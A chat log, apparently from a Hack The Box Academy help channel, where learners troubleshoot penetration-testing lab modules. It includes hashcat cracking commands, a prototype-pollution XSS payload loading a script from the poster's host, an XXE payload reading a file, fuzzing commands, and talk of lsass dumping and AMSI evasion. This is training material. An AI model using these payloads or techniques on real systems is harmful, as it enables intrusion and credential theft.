Ok i found it

storm elk
#

Good job

foggy monolith
#

Good, now again, why the unstable SMB connection in the module I'm working on?

cloud urchin
#

could be the server, maybe try another region

junior oxide
#

i am writing a report for ANE do i add the list of sub domains i exploited the in the "Exploited hosts" section in the appendix?

hard matrix
#

Has anyone done Password attacks “Passwd, Shadow & Opasswd” section of the password hacking module recently?
This is driving me nuts. Feels like no matter what different rulelists I use to mutate the wordlist given in wordlists to crack the unshadowed shadow.bak file, nothing returned from hashcat

late moth
#

I'm in the attacking common services module on the easy assessment. I got a username from the smtp service. I am stuck tho. I have tried bruteforcing my way into ftp,rdp etc and nothing. I have been at it for awhile.. any hints to point me in the right direction?

safe star
#

u have to use rockyou instead of the resource password 🤦‍♂️

#

makes no sense

late moth
#

lol...well ty i appreciate that

hard matrix
safe star
#

yeah im talking about neon

hard matrix
#

¯_(ツ)_/¯

hallow kiln
#

The mutated password list is the correct one yes

safe star
#

maybe u got the wrong hash format

hallow kiln
# safe star makes no sense

The logic for module password cracking is this: 1. List in resources, 2. List you generate throughout the module, 3. List you find on a target, 4. rockyou

hard matrix
#
PS A:\oven\HACKERMAN\hashcat-6.2.6> ./hashcat.exe --force .\cpts\Password-Attacks\resources-original\password.list -r .\cpts\Password-Attacks\resources-original\custom.rule --stdout | sort -u > .\cpts\Password-Attacks\resources-original\password_mut.list
PS A:\oven\HACKERMAN\hashcat-6.2.6> ./hashcat.exe -m 1800 -a 0 .\cpts\Password-Attacks\unshadow.txt .\cpts\Password-Attacks\resources-original\password_mut.list -o .\cpts\Password-Attacks\unshadow.cracked

[....]

Session..........: hashcat
Status...........: Exhausted
#

maybe skill issue

hallow kiln
#

Don't use force or ChickenMan will come get you

safe star
#

try taking the attack mode off

hallow kiln
#

The module says to do it, but the actual developer says not to

hard matrix
#

regen'd without --force and removed -a 0
going to bash my head into my monitor

hallow kiln
#

Did that work?

hard matrix
#

no

#

lmao

hallow kiln
#

DM me the hash

safe star
#

yeah im sure that should work

hard matrix
#

likely pebcak

hard matrix
safe star
#

send me it too

#

i kinda wanna see why that didnt work

upbeat oak
#

Hey so I'm doing the password attacks hard lab and I'm using dislocker to access the files however when I attempt to mount the drive I get this error using these commands

sudo mount -o /media/bitlocker/dislocker-file /media/bitlockermount
mount: /media/bitlockermount: can't find in /etc/fstab.
do I need to edit the /etc/fstab? I'm afraid that could mess with the machine if I do though?

safe star
#

i played it safe and transfered it to a windows vm

hallow kiln
#

But it did seem faster to mount it on Windows so that's what I did at the time

upbeat oak
hallow kiln
#

Yeah, I think it was just something like Disk Management - Attach VHD, done

hard matrix
# hard matrix Has anyone done Password attacks `“Passwd, Shadow & Opasswd”` section of the pas...

incase anyone reads channel history and has the same issue:
my problem is that I am using windows hashcat to be able to use my GPU without passthru to kali.
the issue is: hashcat ends up generating a wordlist based on custom.rule list from module resources in Windows with around 40k less lines.

I fixed this by generating the wordlist from the rules locally in kali, transferring that wordlist to windows, and cracking from windows like normal.

fathom pendant
fathom pendant
fading oracle
#

@marble cypress sent you a dm if you dont mind

paper basalt
#

How is it determined/decided which modules etc. grant cubes?

foggy monolith
#

Connection speed has improved somewhat, but I'm still running into this problem periodically. Just curious as to why Samba would ever be slow enough for this to be necessary.

#

Note the barrage of "NT_STATUS_IO_TIMEOUT" errors — shouldn't be happening, but it is. Why?

#

@cloud urchin ^

cloud urchin
#

a timeout error is generally going to mean a network issue of some kind, but it could also be a region issue with htb. first troubleshoot your connectivity.

#

also make sure to wait a few mins after spawning the victim machine because it can take a few minutes to fully come online

cloud urchin
#

try reading the section again

foggy monolith
#

Oh, 🤦🏼‍♂️

#

Okay, now I'm getting NT_STATUS_BAD_NETWORK_NAME.

fathom pendant
#

Probably trying to call it incorrectly

#

Also you don't need to escape the $ at the end I don't think

#

Or you can try wrapping it in quotes, if you're truly needing to connect to ipc

foggy monolith
#

Well if I don't escape the $ at the end then Bash freaks out.

fathom pendant
#

Single quotes*

#

Bad_network_name generally means it's not meant to be connected to

#

If this is the getting started module, you don't connect to IPC$

foggy monolith
#

No, I know; was way off track trying to go down rabbit holes not knowing that the whole thing was white-box the whole time. I'm still, however, having to use shell loops to work around the NT_STATUS_IO_TIMEOUT problem which for whatever reason is still rearing its ugly head intermittently.

fathom pendant
#

That's just a connection thing

#

¯_(ツ)_/¯

#

Which can happen even in the pwnbox

#

Depending on server load

foggy monolith
#

Yeah, PwnBox is what I've been in the whole time, and US-Academy-4 is one of the "recommended" connections with a low load. So still wondering what the problem is.

fathom pendant
#

Eh recommended usually just means closest vpn endpoint to you, there's also different pwnbox regions

lavish bluff
#

Ahhhhhhh, can someone help me with the "Introduction to the Windows Command Line" module, specifically the last question in the skills assessment section? I’ve tried several methods and attempted various users, but for some reason, none of the answers are being accepted.

foggy monolith
#

Yeah, seems a lot of traffic in SoCal, but the load is also in the green. So still stuck.

fathom pendant
#

Iirc it states connect to the DC and find this info

#

(The domain controller IP was given earlier)

lavish bluff
fathom pendant
#

If you aren't connecting to the DC, you aren't gonna get the right answer 👍

jovial geode
#

has anyone completed Whitebox attacks? I'm stuck in the part for prototype pollution for DOM based xss, I've been at it for a few days now but I can't manage to figure it out.

olive ingot
#

What is the best coding app for html

rustic sage
#

You mean like best ide?

olive ingot
#

Yeah

#

So like where to program and test them

rustic sage
#

Well depends a lot on personal preference, but VSCode and Sublime text are two I use personally for coding in general

olive ingot
#

Thx i will try them out sorry new to coding and to this server

hexed ginkgo
#

I cant buy modules

#

So im asking here

#

finally

#

I clicked a hundred times to buy it hahaha

fathom pendant
inland mesa
#

am i going insane or is rockyou.txt no longer in the terminal

#

nvm it was saved as .gz that confused me for a sec

fathom pendant
#

As the list is very big

inland mesa
fathom pendant
#

If you mean on pwnbox, maybe

#

Btw hashcat generally doesn't have issues reading from it zipped

finite mist
#

Has anyone done Windows Privesc Pillaging section? I can't get the restic backups working for some reason and can't bypass the Access Denied

sonic plume
#

hi, my root flag for "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer." doesnt work.. (yes i removed all spaces, clear web caches) but all doesnt work..

livid zodiac
#

beginner here. a bit stuck on the flag for the public exploits page of the penetration tester path. i found the exploit i need to use but am struggling with the filepath. maybe im getting the structure of it wrong, but everything i've tried returns no result

#

i feel like what i should be using as the path is literally stated on the website but when i put that as the filepath in the exploit it doesnt return any files

#

got it lol

#

way simpler than i thought it would be...

#

holy cow im blind. just went to submit the flag and realized it says the path in the question. 🤣

rustic sage
#

holy cow I don't get a single word of what ur saying

#

im a noob

olive ingot
#

Hey it’s me again,

#

What is the best way to learn html

rustic sage
#

u could learn html by randomly scrolling w3schools and making dumb projects like me

#

why would you actually want to learn html?

olive ingot
#

Oh okay thx appreciate it

jovial geode
#

MODULE: Whitebox Attacks
SECTION: Client-Side Prototype Pollution

I'm really struggling with getting the admin user to get the /admin.php?promote=2 link to load. I can get the xss, which i just hosted the .js file with a python http server, but when I submit the link to the profile page, it never loads and I can never get the flag. I understand it's something with a link and /admin.php?promote=2 and I can get the xss, but I'm unsure where to go from here since Everytime i submit the link it never works

My current payload for the xss is

||http://94.237.56.194:47879/profile.php?id=2&__proto__[src][]=http://10.10.15.150:1337/test.js||
, where test.js would be like alert(1)

However, if I submit the link for /admin.php?promote=2, it never works and I can't get it to load or even with my resular js file.

#

@upper haven can I please get a hint? I've been stuck on this for days

fathom pendant
real mortar
#

MODULE: Password Attacks
SECTION: Credential Hunting in Linux

Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Don't need help for this section but wonder how someone could solve this without using "HINT"? I was stuck here for a long time as I had planned not to use hints. The hint gives us additional background information about another user and their possible password for us to work on and I was wondering if it is possible to solve without using it? Does anyone know?

viral snow
#

Hi y'all! I could use some help!

I'm stuck on the last two questions in IMAP/POP3 of the Footprinting module.

I've searched through Google, YouTube, Reddit, and the HTB forum. I cannot for the life of me find the correct command(s) needed to find the admin email address, and the IMAP server flag.

Please help 😩

safe star
fathom pendant
#

The admin email is in the email sent to the compromised user

safe star
viral snow
viral snow
# safe star Chatgpt is really helpful in these situations

ChatGPT is looking really tempting because I've been stuck on this thing for four hours. None of the commands provided in the exercise work. And I've gotten very little to no help out of Google, YouTube, Reddit, and the HTB forums.

safe star
#

Yeah it helped me with some mssql commands

#

I just typed “How to get an email out of an imap message in telnet” and got the command

viral snow
#

I can't post screen shots here?

hallow kiln
eager ledge
#

Also, the remaining time keeps on increasing why?

viral snow
#

Found it! 🙌🏽 it only took me half a day 😤

eager ledge
spark spruce
#

server-side-attack skill assessment
is it so simple to get the flag
maybe it is a bug
anyone who solved this
pls let me know

cloud urchin
#

it's solvable

spark spruce
stark lark
#

"What AD User has a RID equal to Decimal 1170?"

Shouldn't I be able to convert this RID (1170) using cyberchef?

simple ledge
#

Module: Pivoting, Tunneling and Port Forwarding -> Dynamic Port Forwarding with SSH and SOCKS Tunneling

Hey all, did anyone else run into connectivity issues on the pivot host? I'm using a Kali VM. I'm able to setup the SOCKS tunnel but when running nmap (with proxychains) on 172.16.5.19, I can see the traffic being routed to the pivot host however on the pivot host it gives a serios of connection errors (same thing happens when trying to RDP with proxychains).

stark lark
simple ledge
#

slight typo it should be 172.16.5.19 not 172.15.5.19

#

but I get the same error

#

@stark lark

#

they're the errors from nmap

bright coral
stark lark
bright coral
stark lark
stark lark
hardy elk
#

Hello, i'm doing the footprinting module. I'm at the SMB part. I can't connect to smb to get the flag.txt , I use this command smbclient //ip/path and then it connects to my machine not the htb machine. Can someone help me please ?

simple ledge
stark lark
simple ledge
simple ledge
simple ledge
stark lark
simple ledge
hardy elk
#

and it's asking my password not the machine password

simple ledge
simple ledge
hardy elk
#

i m trying to connect to sambashare

hardy elk
simple ledge
# hardy elk i m trying to connect to `sambashare`

I don't want to give away the answer because I'm not sure if HTB will get annoyed but if you look up anonymous SMB logins it is an easy solution. There is a default way to login to SMB, if anonymous login is enabled. The password it is asking for is for SMB, not your computer.

hardy elk
#

okay yeah i found it, i have just restarted the machine and it worked

#

thanks for helping

simple ledge
#

np

chrome dew
#

Hey guys, im stuck on a module: Information Gathering - Web Edition Skill assessment

||I cant seem to find the hidden web directory "Admin" That the room is hinting to. Im using this command:||

||```
feroxbuster --url=http://inlanefreight.htb:51557/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 64

fierce granite
#

are there any free paths?

jolly dagger
#

I'm working ont he Intro to Windows Evasion. ThreatCheck to make Rubeus bypasss AMIS. Looks like it's caught on bytes associated with 'mscoree.dll'. I attempted to find where this is in the program, but I don't see it. I'm not sure where to search or research next. Any assistance with this would be great.

stuck stump
#

Yo

#

K bet

#

Or nah

storm elk
#

This isn’t the place. That’s cheating and illegal

stuck stump
#

Oh

#

Erm

#

Oops

storm elk
#

If you are only looking for cheats for your game, I suggest you find another server 🙂

stuck stump
#

What serv

#

I need to know

storm elk
stuck stump
#

Then what is this

jolly dagger
#

Professional platform where cyber security professional learn skills to use in their work.

calm abyss
#

Hello, i got stuck on Game Hacking Fundamentals - Skills Assessment

What flag is displayed when you successfully modify the Lives counter to a value greater than 5?

So i downloaded the game, and i found the lives address and changed it to 9 and on the bottom of the app a text appeared, but when i try to answer the question the answer is wrong.

jolly dagger
#

If you're looking to download hacks, go somewhere else.

stuck stump
#

Oh lol wrong thing byee

storm elk
jolly dagger
#

It's actually funny, because he could learn how to do it, literally post above his is learning. But I don't think Jack has the patience.

stuck stump
#

Oop

#

Womp womp way to tired

upper haven
chrome dew
hallow kiln
solar snow
#

Hello eyeryone

normal sand
#

Is it better to use ports below 1024 for a listener or above? I've read that listening on ports below 1024 can help with firewalls/bypassing security measures, any downsides?

high warren
#

Hello, here is my issue

Question 1 : SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

ssh [given user]@[given ip] -p [given port number of target IP]
sudo -l
sudo -su user2
cd ~
ls
cat flag.txt

I've got no problem here but for the second question : Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

I'm trying to escalate the privileges to root withe the id_rsa key, but still when I try to connect with ssh it ask for a password.

What should I do ?

heavy mango
high warren
#

yes

#

on my htb machine

heavy mango
#

Did you set the correct permissions on the key file?

high warren
#

yes i did "chmod 600"

heavy mango
#

Make sure you don't have any whitespace or extra characters in the file. You can see whether SSH is actually using the file by doing ssh -vvv -i <keyfile> <target> and verify the debugging messages

high warren
#

target is user2

#

I have no Ip

heavy mango
#

what do you mean? Who is the id_rsa key for?

solid moth
#

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

high warren
#

Look what i did :

copied the id rsa from user2, pasted it on my local machine. And tried ssh connection on my local "ssh root@localhost -v -i id_rsa"

heavy mango
#

why?

#

if the key is for user2 on a different box, SSH-ing to your own machine as root with that key is never going to work

high warren
#

I'm lost

#

So what should I do then ? Copy the key on user2 ?

heavy mango
#

What module and section is this from?

high warren
high warren
nimble lodge
#

I'm finding for which CMS which is used in the above lab and tried with the curl command to see within the header but it didn't showup. Any clues?

heavy mango
calm abyss
#

anybody did a game hacking module ?

solid moth
#

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

heavy mango
high warren
#

it's working

solid moth
#

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

main acorn
#

can any one help me in findind XSS vulnerability .In session hijacking module . im literaly stuck there , cant find any xss vulerability . tho i made a listening port also

#

guys help me

nova ginkgo
#

Hello
in "https://academy.hackthebox.com/module/143/section/1490" first question I dont understand why that's answer is 7
when i search with ldapserach output is :
┌─[✗]─[htb-student@ea-attack01]─[/home/administrator]
└──╼ $ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 5
maxPwdAge: -9223372036854775808
minPwdAge: -864000000000
minPwdLength: 8
modifiedCountAtLastProm: 0
nextRid: 1002
pwdProperties: 1

Plesa can someone explain me

autumn pilot
#

it is in the material in the section

nova ginkgo
autumn pilot
#

it is explained in the section

nova ginkgo
autumn pilot
#

there isn't a module basics of sql injection

north bramble
autumn pilot
#

Don't run it with sudo

#

As you wont have the $DISPLAY variable properly set

north bramble
north bramble
#

thanks for your help

jolly dagger
#

I'm working ont he Intro to Windows Evasion. ThreatCheck to make Rubeus bypasss AMIS. Looks like it's caught on bytes associated with 'mscoree.dll'. I attempted to find where this is in the program, but I don't see it. I'm not sure where to search or research next. Any assistance with this would be great.

pseudo kiln
#

i am re-doing the Information Gathering Web edition module after the update. I notice there are new questions, but the answers of the previous module version are still there, so I cannot input the answer of the new questions. Any way around that ?

tender nimbus
#

hey guys, im stuck at the getting start module knowledge check, i cant dowload the LinEnum.sh script on the target machine i receive this erro do you guys know why?

pseudo kiln
#

Check the permissions for your pwd

tender nimbus
jovial geode
#

i would guess that you do'nt have write permissions to /, you'd most likely can write it to /tmp or /dev/shm

tender nimbus
#

oh im not mrb3n lol

tepid vigil
#

hello everyone

tender nimbus
#

do you also know when you do an ls -la whet p means in the beginning? Its not a dir or file?

#

never saw it before

tepid vigil
#

doing fuzzing vhosts on htb academy right now

#

stuck on a minor problem

#

😅

#

would be great if anyone can help out

bright coral
tepid vigil
tender nimbus
tender nimbus
#

its a bit overwelmingh ^^ first time "hacking" a box

gilded radish
#

👍

analog dock
gilded radish
#

it's easy one, check the website above

analog dock
#

Search for php, and see what you can do with it

gilded radish
#

@tender nimbus just remember to use "sudo php ..."

tender nimbus
solid moth
#

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

bright coral
tender nimbus
#

omg it <as so simple

#

i was searchoing to far

#

it was just this to do i tought i had to look to shell and all that stuf

chrome dew
#

Doing the Attacking Web Applications with Ffuf Module and im having problems with the Final assessment question: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

#

I have the page and the full URL. But it doesnt work...i have tried removing the port number but to no success

#

In waht format should i provide the answer

#

NVM i got it

calm abyss
#

how can i report a error in the module

I was doing Game Hacking Fundamentals - Skills Assessment
I managed to change lives to 23 and got a flag but when i enter the flag it is wrong answer.
What flag is displayed when you successfully modify the Lives counter to a value greater than 5?
So i skipped that and did the second question
What flag is displayed when you successfully modify the HiddenScore counter to a value greater than 200'000'000?
So i changed the value to 300000000 and got a flag, i entered the flag and it was correct.
So i was wondering whats going on ?

honest gyro
#

It usually because of this issue

#

If it’s still didn’t work try contacting the support

calm abyss
honest gyro
calm abyss
honest gyro
#

Click on it and u can contact them

honest gyro
solid moth
solid moth
cloud urchin
solid moth
#

i am able dump lsass but secretsdum won;t work

#

"impacket-secretsdump lsass.dmp -o output.txt " i use this command

#

RemoteOperations failed: encoding with 'idna' codec failed (UnicodeError: label empty or too long) this is error message

cloud urchin
#

there are a few different ways to get the hashes when you have admin

solid moth
#

i tried mimikatz, secretsdump and hashdump in meterpreter

#

all failed

cloud urchin
#

there is another way

solid moth
#

please tell me

#

i think i found the user's name wks

#

wksadmin

tepid vigil
#

Hello

#

I need help with Web fuzzing / filtering fuzzing outout/So I Tried fuzzing Directories and then fuzzing Post using

ffuf -u http://IP:PORT/post.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "y=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/common.txt -v -mc all

With the port I was using I tried filtering by size and such but all I het is incorrect parameter Y. Thanks for the help in advance

solid moth
sly trench
#

Bro I've been on footprinting path under DNS module for 2 days straight. This thing is absofuckinglutely undreadable

gilded radish
#

and replace RHOST with your vpn ip and RPORT with another port listener

#

and then execute

#

I wanted to ask, it's a machine but still, is it okay to btute force password for more than 5 minutes 7

rustic sage
#

Can someone help me with a fedora Linux problem😅

#

I installed fedora on a MacBook Air and I also installed the required drivers for wifi connectivity but recently after an update it stopped working. I looked into it and it appears the cpu is interrupting the process created by that driver.
I reinstalled the driver and nothing changed.

tiny brook
#

how do i connect to the HTB vpn

analog dock
#

Then just use openvpn

tiny brook
#

ive got arch

analog dock
#

Openvpn

slim badge
#

Hey man! If you still need help, ping me back. I can help! 🙂

dim wolf
#

you can always redo the lab using only powershell

tender nimbus
#

Do someone know a taking note app that i can use for my notes? I use oneNote for the moment but i don't realy like it

wary plover
tender nimbus
wary plover
acoustic owl
mint lodge
#

Uhhh what?

#

Why are the EU servers dead?

small basin
mint lodge
#

😦

north bramble
#

frens whats wrong, using rpivot with Pivoting, Tunneling, and Port Forwarding module

#

supposed to run with python 2.7, how do I fix this?

lusty sierra
small basin
#

Hey everyone, right now I'm doing "The Live Engagement" from "Shells & Payloads"

I managed to get the rev shell via ||tomcat war file||. Now I wanted to try the second way ||via the status page. I uploaded the antak.aspx, but neither can switch directories nor can I execute a PowerShell reverse shell command. || I get errors like "term '=' is not recognized.

Any idea why the antak web shell doesn't work here?

north bramble
small basin
north bramble
# small basin that works and gives me the hostname back

sometimes webshells dont work. you cant change directories. I saw this in the AD module or somewhere else, dont remember. if you are trying to get the flag then you directly cat it with the full path. eg cat C:\user\administrator\desktop\flag.txt

north bramble
small basin
north bramble
north bramble
small basin
light zenith
#

Hello guys

#

I have a problem at java deobfuscation lesson

#

I find the flag but doesn't accept it.

quasi jungle
#

Are the PwnBox's offline?

misty shadow
#

Hello everyone,

I hope you're all doing well.

I'm currently working on the third exercise of the module "https://academy.hackthebox.com/module/18/section/80" and I'm encountering some difficulties. Specifically, I'm trying to count the unique paths in the source code of the website inlanefreight.com using the following command:
curl -s https://www.inlanefreight.com | tr "?'" '"' | grep -Eo 'https?://www.inlanefreight.com[^"]+' | sort --unique | wc -l
This command returns 33 unique paths, but unfortunately, the answer appears to be incorrect. I would greatly appreciate it if someone could kindly assist me in identifying where I might be going wrong.

Thank you very much for your time and help.

Best regards,
Ronaldo Oliveira

fathom pendant
tender nimbus
#

hey guys quick question we right its this ip add that i have to scan for the lame box? bcs idk why but it don't seem to work? I already have set the vpn connection etc but it won't work

#

also if i do a scan of all ports with -p- it gives me 0 open ports

safe star
#

Try the pwnbox

tender nimbus
#

may i ask a question about netcat?

fathom pendant
#

This channel is for discussion and help with academy modules

tender nimbus
#

okej mb ^^

fathom pendant
#

I mean... the php page tells you what param to use...

#

Then after it tells you what subdomain to start with... and then what directory

#

Tbh this skill assessment leads you to the next clue after each successful fuzz part

#

You don't know the domain to even begin to fuzz with until you crack past the parameter

#

But everything is in common.txt where they want you to fuzz from

thorn sonnet
#

Hello im trying to download the parrot sercurity but im having some issues. i have the samsung tablet/ laptop

fathom pendant
#

then you need to filter the output

fathom pendant
#

wtf is this chatbot response

fathom pendant
misty shadow
fathom pendant
#

your response sounded AI lmao

#

also this isn't a tech support room

misty shadow
fathom pendant
#

if you read the channel description it tells you what it's about 😉

misty shadow
fathom pendant
#

it's ok to be helpful, but also be mindful of directing people to better places for requesting help

fathom pendant
#

stop doing onetwo.htb and just use the IP:PORT; also it'll be -fs to filter size, or -ac for autocalibration

#

to filter size, you'd use the most common output size that you're getting alongside the 200s

#

you also don't need to run ffuf with sudo

#

also http:// not http:/

mental hill
fathom pendant
#

it's a GET

#

@mental hill since your posts are including the full name of the parameters and fuzzed values i'm gonna ask that you redact them

#

yes even behind spoiler text

#

as i've stated ad infinitum; spoiler text does nothing

mental hill
#

got it sry and god dammit thank you

fathom pendant
#

in future you can redact things with /a*/p* and those that have done it will know what you're referring to

#

or the parameter a*

fathom pendant
#

remember how to mount nfs :)

#

nfs == networkfileshare

#

note it might restrict you to needing sudo to enumerate it

#

well... did you replace the [IP] with the target IP?

#

covering bases my guy

#

did you also specify the sharename?

#

yes

#

spoiler

#

but anyway

#

did you specify in your mount: IP:/sharename

viral snow
#

I'm having trouble trying to install scrapy.

I used pip3 install scrapy

I also tried using sudo apt install scrapy

Any help, please?

daring atlas
fathom pendant
viral snow
fathom pendant
#

it worked because that's how you're meant to mount a share

fathom pendant
fathom pendant
#

also the error you get from the pip install explicitly tells you what to do

#

so

#

there's also that

#

reading error message challenge; difficulty: impossible

#

also you can't just "install scrapy" via apt it's usually sudo apt install python3-[python module]

#

which is also told to you, in the error

viral snow
fathom pendant
#

:) because I take it the error you got was something along the lines of "Externally managed environment"

viral snow
fathom pendant
#

i can guarantee you, it did

viral snow
fathom pendant
#

most of the time errors will tell you what's wrong

mental hill
fathom pendant
#

think of the Web Fuzzing Assessment as a checklist of what you learned

#

once you used a technique, you can generally disregard it (file extension, parameter, subdomain...)

#

so next steps will always be something you haven't acheived yet

viral snow
fathom pendant
#

there's no need to stress brother

#

you aren't timed on it

#

you get to the end result when you get there

#

what matters is you learned something on your journey there

civic hamlet
#

the windows module is much shorter then linux, much easier too

fathom pendant
#

because windows is probably more what you're used to

#

¯_(ツ)_/¯

#

also Windows UX is generally catered towards more casual users

civic hamlet
#

cant wait to check out some of the other modules in the security foundations path, really excited to eventually do intro to network traffic / intro to networking

#

though i dont think i need the former, ive read 400 pages of tcp/ip

viral snow
fathom pendant
#

network traffic will be more interesting imo

#

but intro to networking is very much just barebones basics

#

and easy +1

viral snow
#

Ok, I don't what I'm doing wrong. I'm trying to get the http server software in Skills Assessment.

I'm doing dig inlanefreight.htb MX. and I'm getting nothing.

I found someone in Google that did the same thing, and he got the answer.

Help 😩

pseudo kiln
#

I have to ask, have you done the InfoSec path prior to pentester path ? This is a pretty basic question, giving the answer to you would not really help your understanding much.

frosty tide
#

Hello, I'm on File Uploads module and kind of stuck with Type Filter section labs. I got several webshell uploaded but couldn't get 1 that execute the code. All got block by my AV when running the GET request, please hlpe

viral snow
# safe star what module

Sorry, Information Gathering-Web Edition.

I used dig inlanefreight.htb MX, and it's giving me nothing.

safe star
#

u shouldnt need dig to get that information

#

the module goes over multiple ways to get software information on the webserver

eager ledge
#

ping is very high for all the regions to spawn the pwnbox:

#

When starting the pwnbox, screen is stuck on "Instance is starting" for quite some time.

rugged harbor
#

Hello the certificate has expired ?

#

For accessing pwnbox

cold dome
#

I'm currently doing "File Upload Attacks - Limited File Upload". I try uploading an svg file and intercepting the traffic to Burp to insert this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>

Unfortunately, I'm not successful to do so. Can you point me in the right direction please? Thanks.

viral snow
viral snow
safe star
#

its just asking what webserver is it running

#

whatweb and curl should help

viral snow
# safe star whatweb and curl should help

Right mate, but alas it yielded nothing. I submitted whatever information I got from either of the two, and my answers kept getting rejected.

cURL was basically blank 🤷🏽‍♂️

Same with whatweb.

I used inlanefreight.htb. When they didn't work, I used the IP address provided in the exercise.

And still...nothing

safe star
#

what options did u add to curl? it should be the first thing you see

#

and whatweb has the answer in blue

viral snow
viral snow
safe star
#

i feel that

#

reread the first paragraph in the vhost section and correlate it with your output

#

gl

cold dome
viral snow
# safe star gl

I am not gonna skip this one, I'll stay on it for as long as I need to, even if it takes me days. But good lord how many times can I keep banging my head on my bloody door?! 😆😆😆

viral snow
# safe star gl

What do you recommend I do? I know you said both cURL and whatweb should've given me the answers.

But as I mentioned earlier, those two were blank. Like absolutely nothing that was of use.

safe star
#

wdym by blank?

#

like nothing at all?

#

curl and/or whatweb is all u need

viral snow
#

Someone said it's because I'm not connected. But where do I connect?

viral snow
# safe star u can dm

Thanks, mate. I'll shoot you a DM a bit later. I have some running around to do that I put off because of this.

Cheers 🍻

frosty tide
safe star
#

he just needs what type webserver its running

dim wolf
#

curl would probably do it

dim wolf
#

update /etc/hosts, do curl, you'll probably get web server software

frosty tide
#

I think he forget to add ip to /etc/hosts haha

dim wolf
#

that's my guess as well, if none of the tools they used were working

safe star
#

I just slapped in the ip from the lab and it worked

spring forum
#

Can I ask questions regarding fuzzing with libfuzzer for the binary fuzzing module

frosty tide
dim wolf
safe star
#

Oh yeah I never deleted the entry

frosty tide
#

Also for that exercise any VHOST you found, you need to add it to /etc/hosts

#

else you gonna stuck on it forever

spring forum
frosty tide
#

If you reset your target dont forget to update your /etc/hosts

safe star
#

Yeah I doubt he forgot to do that but it’s possible

frosty tide
oak girder
#

Please help me. I have no idea

elder kraken
#

Is it normal that my rdp connection closes every 3 minutes?

safe star
#

That happened to me on the passwords attack module

elder kraken
#

I'm in the same module